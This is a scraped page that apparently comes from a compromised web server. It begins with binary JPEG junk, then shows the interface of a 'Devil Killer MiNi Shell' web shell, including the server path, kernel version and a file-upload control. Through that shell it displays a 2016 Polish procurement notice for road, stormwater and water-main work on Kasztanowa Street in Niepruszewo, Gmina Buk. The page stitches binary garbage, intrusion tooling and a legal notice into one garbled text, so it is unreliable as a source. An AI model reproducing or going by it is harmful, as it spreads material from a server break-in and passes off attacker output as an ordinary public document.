JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160408/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160408/82402-N-2016.html

<p class="kh_header"><b>Buk: BUDOWA ODCINKA ULICY KASZTANOWEJ W NIEPRUSZEWIE NA TERENACH PARKU PRZEMYSŁOWEGO - GMINA BUK - ETAP II WRAZ Z FRAGMENTAMI SIECI KANALIZACJI DESZCZOWEJ ORAZ WODOCIĄGOWEJ</b><br>
<b>Numer ogłoszenia: 82402 - 2016; data zamieszczenia: 08.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Buk , ul. Ratuszowa 1, 64-320 Buk, woj. wielkopolskie, tel. 061 8140671, faks 061 8140101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.buk.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA ODCINKA ULICY KASZTANOWEJ W NIEPRUSZEWIE NA TERENACH PARKU PRZEMYSŁOWEGO - GMINA BUK - ETAP II WRAZ Z FRAGMENTAMI SIECI KANALIZACJI DESZCZOWEJ ORAZ WODOCIĄGOWEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest budowa ulicy Kasztanowej na terenach AG w Niepruszewie - gmina Buk - etap II wraz z fragmentami sieci kanalizacji deszczowej oraz wodociągowej, od odcinka zrealizowanego w 2013 roku do ul. Modrzewiowej 
Zakres robot:
1.1.Roboty drogowe:
Projekt budowlano - wykonawczy obejmuje budowę drogi o długości L = 930 mb od ulicy Cisowej do ulicy Modrzewiowej. Jednak przedmiotem niniejszego zamówienia jest budowa drugiego odcinka drogi od odcinka zrealizowanego w 2013 roku do ul. Modrzewiowej, o długości L = 490 mb o nawierzchni bitumicznej na podbudowie z kruszywa w obramowaniu ze ścieku terenowego korytkowego na ławie betonowej. Powierzchnia drogi P = 490 m (długość odcinka) x 7,00 m (szerokość) = 3.430 m kw. 
Parametry techniczne.
Projektowany zakres robót posiada parametry techniczne zgodne z Rozporządzeniem Ministra Transportu i Gospodarki Wodnej z dnia 2 marca 1999r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz.U. z 2016r. poz. 124):
klasa dróg - L i D (wewnętrzne)
kategoria ruchu - KR3
szerokość jezdni - 7,00m
pochylenie podłużne - 2,00%
pochylenie poprzeczne jezdni daszkowe - 2,00%
przekrój - drogowy
Przekrój normalny.
Przed przystąpieniem do robót zasadniczych należy zdjąć warstwę humusu zalegającą na głębokość około 40 cm z przeznaczeniem na wywóz. Po wykorytowaniu w miejscach wynikających z profilu podłużnego i przekrojów poprzecznych, celem uzyskania projektowanej niwelety należy uzupełnić przestrzeń pomiędzy gruntem rodzimym a projektowaną konstrukcją gruntem z dokopu (piasek) o parametrach G1. Podłoże należy zagęścić do uzyskania współczynnika Is większy równy 1,0. Grunt pozostały z korytowania oraz zdjęty humus należy rozplantować na terenach przyległych do pasa drogowego po uzyskaniu zgody właścicieli działek.
Z uwagi na kategorię gruntu G2 projektuje się wzmocnienie podłoża pod projektowane elementy w postaci warstwy stabilizacji cementem gr. 10 cm o Rm = 2,5MPa.
Jezdnię należy ograniczyć ściekiem terenowym korytkowym szerokości 0,5m z betonowych elementów prefabrykowanych na ławie betonowej z oporem z betonu C 12-15. 
Podbudowę pomocniczą projektowanych dróg stanowić będzie warstwa kruszywa łamanego stabilizowanego mechanicznie układana dwuwarstwowo, warstwa dolna podbudowy frakcji 31,5-63mm, gr. 15 cm, warstwa górna frakcji 0-31,5mm grubości 8cm. Na niej układana będzie warstwa podbudowy zasadniczej z AC16P grubości 13 cm a następnie warstwa ścieralna AC11S, grubości 5 cm. 
Załadunek i wywiezienie pryzmy ziemi zmieszanej z gruzem leży po stronie wykonawcy.
Szczegółowy zakres robót - wg projektu budowlanego, wykonawczego oraz SSTWiORB. 
1.2.Sieć kanalizacji deszczowej:
Projekt budowlano - wykonawczy obejmuje budowę odwodnienia w postaci kanalizacji deszczowej  o długości 1.202,80 m. Jednak przedmiotem niniejszego zamówienia jest budowa drugiego odcinka kanalizacji od studni S-14 do studni S-20 wraz z wpustami kanalizacyjnymi od Wp - 22 do Wp - 38 (18 wpustów deszczowych) Rozbudowana sieć kanalizacji deszczowej będzie włączona do istniejącej studni S 14.
Szczegółowy zakres robót - wg projektu budowlanego, wykonawczego oraz SSTWiORB. 
1.3.Sieć wodociągowa:
Projekt budowlano - wykonawczy obejmuje budowę sieci wodociągowej o długości 948.5 mb. Jednak przedmiotem niniejszego zamówienia jest budowa drugiego odcinka sieci wodociągowej od odcinka wybudowanego w 2013 roku do ul. Modrzewiowej. Rozbudowana sieć wodociągowa będzie włączona w istniejącą sieć w miejscu zasuwy Z2 w ul. Kasztanowej oraz miejscu W7 na                            ul. Modrzewiowej. Ponadto zaplanowano posadowienie 2 hydrantów przeciwpożarowych naziemnych. Wodociąg należy wykonać z rur PE100SDR11 średnicy 160mm zgrzewanych doczołowo oraz montaż elementów uzbrojenia sieci wodociągowej - hydranty, zasuwy, niezbędne kształtki. Projekt obejmuje jedynie budowę sieci wodociągowej bez przyłączy. Przyłącza realizowane będą indywidualnie na podstawie oddzielnych opracowań.
Szczegółowy zakres robót - wg projektu budowlanego, wykonawczego oraz SSTWiORB. 
2.Niniejszy przedmiot zamówienia należy wykonać zgodnie z:
1) projektem budowlanym, wykonawczym opracowanym przez Pracownię Projektową FORMA spółka cywilna Wanda Formanowska, Radosław Formanowski, z siedzibą w Wilkowicach przy ul. Dębowej, 64-115 Święciechowa
2)  Specyfikacją Istotnych Warunków Zamówienia,
3)  obowiązującymi przepisami prawa budowlanego i przepisami prawa dotyczącymi warunków     technicznych oraz zgodnie z zasadami sztuki budowlanej,
4)  Szczegółową Specyfikacją Techniczną Wykonania i Odbioru Robót, 
5) Decyzją pozwolenia na budowę Nr 6029-10 wydaną przez Starostę Poznańskiego w dniu 26.10.2010 roku,
6) Decyzją pozwolenia wodnoprawnego Nr WŚ.VIII.6223-17-10-10 z dnia 13.10.2013r.,
7) Decyzją pozwolenia na użytkowanie PINB-WIK-415-488-2013-15895.
3. UWAGI DO PROJEKTU i SSTWiORB
1) Zamawiający będzie wymagał od Wykonawcy projektu organizacji i zabezpieczenia ruchu na czas trwania robót oraz jego realizacji podczas trwania robót. 
2) Zamawiający przewiduje możliwość wystąpienia robót związanych z: dostosowaniem istniejących zjazdów do posesji poprzez ich częściowe przebrukowanie, wyprawkami betonowymi istniejących cokołów płotów lub fundamentów budynków.
3) Występujące w dokumentacji nazwy własne producentów lub wyrobów zostały użyte wyłącznie w celu wskazania założonego standardu przyjętych rozwiązań. Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych materiałów i urządzeń niż podane w dokumentacji technicznej pod warunkiem zapewnienia parametrów równoważnych - nie gorszych niż określone w tej dokumentacji. Pod pojęciem parametry równoważne - nie gorsze Zamawiający rozumie parametry o co najmniej takich samych lub wyższych standardach jakościowych, niż wskazane w dokumentacji projektowej , w tym w SSTWiORB.
4) W przypadku opisu przedmiotu zamówienia za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1-3 ww Ustawy Pzp Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego. 
5) Po zakończeniu wszelkich robót, dokonaniu wpisu w dzienniku budowy przez kierownika budowy i potwierdzeniu gotowości do odbioru przez inspektora nadzoru Wykonawca pisemnie zawiadomi Zamawiającego o gotowości do odbioru. Do zawiadomienia Wykonawca załączy miedzy innymi inwentaryzację geodezyjną powykonawczą w 4 kompletach zawierającą:
- mapy sytuacyjno-wysokościowe z wkreślonym przebiegiem sieci kanalizacyjnej z przykanalikami, studniami rewizyjnymi i studniami przyłączeniowymi oraz potwierdzenie złożenia dokumentacji w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej w Poznaniu - 1 komplet map Wykonawca dostarczy Zamawiającemu w dniu zgłoszenia gotowości do odbioru końcowego,pozostałe 3 komplety map - niezwłocznie po uzyskaniu pieczątki z Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej w Poznaniu potwierdzającej przyjęcie dokumentacji do zasobów Ośrodka,
- szkice geodezyjne,
- zestawienie długości wybudowanej sieci kanalizacyjnej, przykanalików, z podaniem ich ilości i średnic, ilości wybudowanych studni rewizyjnych i wpustów, z określeniem materiałów, z jakich zostały wykonane i średnic, ilości (w m2) wbudowanego ścieku korytkowego, ilości (w mb) wbudowanego krawężnika, obrzeży i innych materiałów.
6) Zamawiający będzie wymagał sprawdzenia sieci wodociągowej pod względem wydajności hydrantów przeciwpożarowych, potwierdzonych stosownym protokołem.
7) Do odbioru końcowego Zamawiający wymaga załączenia protokołu wraz filmem (na płycie CD lub innym nośniku elektronicznym)  i opisem z badań przeprowadzonych kamerą telewizyjną. Na filmie winien być także zapisany spadek podłużny rejestrowany pomiędzy studniami rewizyjnymi. W komplecie Wykonawca musi załączyć plan orientacyjny umożliwiający dokładne umiejscowienie filmowanych odcinków kanalizacji. Całość sprawozdania wizyjnego wykonać wg  PN-EN 13508-2 Stan zewnętrznych systemów kanalizacyjnych - Część 2: system kodowania inspekcji wizualnej..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.20-6, 45.23.13.00-8, 45.33.23.00-6, 45.23.11.12-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości: 10.000,00 zł. 2. Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.: 1) pieniądzu, 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 3) gwarancjach bankowych, 4) gwarancjach ubezpieczeniowych, 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2014 r. poz. 1804 z późn. zmianami). 3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. 4. Wadium w pieniądzu należy wnieść przelewem na konto Zamawiającego: Nr 83 1020 4144 0000 6502 0007 2116. 5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego. 6. W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego - Urząd Miasta i Gminy Buk, ul. Ratuszowa 1 - pok. 31 lub dołączyć do oferty. 7. Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt. 2 ustawy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania, że Wykonawca posiada wiedzę i doświadczenie Zamawiający żąda wykazania, że w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał przynajmniej 1 robotę budowlaną o wartości nie mniejszej niż 1.000.000,00 zł, której przedmiotem była budowa lub przebudowa drogi lub ulicy wraz z siecią kanalizacyjną (deszczową lub sanitarną) wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Dowodami , o których mowa wyżej są:- poświadczenia,
- oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczeń, o których mowa w tirecie pierwszym.
Jeżeli wartość wykonanych robót (w wykazie robót, bądź dokumentach potwierdzających należyte wykonanie robót) zostanie podana w innej walucie niż złoty polski, Zamawiający dokona przeliczenia tych wartości na podstawie średniego kursu NBP, z dnia ogłoszenia niniejszego postępowania.W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane zostały wykonane, Wykonawca nie ma obowiązku przedkładania dowodów , o których mowa wyżej.
Ocena spełnienia warunku zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu 
o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego 
i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowaniem, w celu wykonania zamówienia min. jedną osobą do kierowania robotami w specjalności: -	drogowej,- instalacji wodociągowych i kanalizacyjnych.Osoba ta musi posiadać uprawnienia do wykonywania robót w swojej specjalności oraz musi posiadać aktualny wpis do właściwej izby samorządu zawodowego.
Wykaz osób należy sporządzić zgodnie ze wzorem stanowiącym Załącznik Nr 1B do SIWZ.
Zamawiający dopuszcza odpowiadające uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a oraz innych przepisów Prawo budowlane (tekst jednolity Dz. U. z 2013 r. poz. 1409 ze zm.) oraz ustawy o zasadach uznania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz. 65). 
Ocena spełnienia warunku zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu 
o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego 
i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany przez osoby uprawnione do reprezentowania podmiotu lub za dowodem pełnomocnictwa - osoby upoważnione, formularz ofertowy. 2. Dowód wniesienia w należytej formie i wysokości wadium. 3. Pozostałe dokumenty i oświadczenia wymienione w SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - procent osób zatrudnionych na umowę o pracę przez okres minimum 6 miesięcy przed upływem terminu składania ofert - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Terminy wykonania robót przedłuża się ile przeszkoda spowodowana jest : a) przez okoliczność, za którą odpowiedzialny jest Zamawiający, b) przez siłę wyższą, c) przez wstrzymanie robót przez Wielkopolskiego Powiatowego Konserwatora Zabytków w Poznaniu lub inspektora nadzoru inwestorskiego, d) zawieszenia robót przez Zamawiającego e) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności, f) przez niekorzystne warunki atmosferyczne, niepozwalające na realizację robót, dla których określona odpowiednimi normami technologia wymaga właściwych warunków atmosferycznych. Przedłużenie terminu wykonania robót nastąpi o tyle dni, ile trwała przeszkoda w ich wykonaniu bez możliwości ubiegania się o odszkodowanie przez Wykonawcę. Podstawą do przesunięcia terminu jest wpis do dziennika budowy, potwierdzony przez inspektora nadzoru inwestorskiego oraz wniosek Wykonawcy dostarczony Zamawiającemu, 2) Po akceptacji Zamawiającego - zmiany podwykonawców, 3) Po akceptacji Zamawiającego - zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych ustawach a także w SIWZ, 4) Zmiany wynagrodzenia Wykonawcy. Zmiany postanowień umowy będą mogły nastąpić w następujących okolicznościach: zmiany ustawowej wysokości VAT, w przypadku gdy w trakcie realizacji przedmiotu umowy nastąpi zmiana stawki VAT dla robót objętych przedmiotem umowy. Strony dokonają odpowiedniej zmiany wynagrodzenia umownego - dotyczy to części wynagrodzenia za roboty, których w dniu zmiany stawki VAT jeszcze nie wykonano i nie zafakturowano. 5) Konieczność wykonania zamówień dodatkowych zgodnie z art. 67 ust. 1 pkt. 5 ustawy Prawo zamówień publicznych lub robót zamiennych , opóźniających lub wstrzymujących realizację robót zasadniczych - termin wykonania zamówienia może ulec zmianie o okres odpowiadający wstrzymaniu lub opóźnieniu wykonywania robót zasadniczych z tego powodu - jeżeli przy zachowaniu należytej staranności z uwzględnieniem profesjonalnego charakteru Wykonawcy nie można było uniknąć zmiany terminu wykonania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.buk.gmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Buk, ul. Ratuszowa 1, 64-320 Buk.</p>
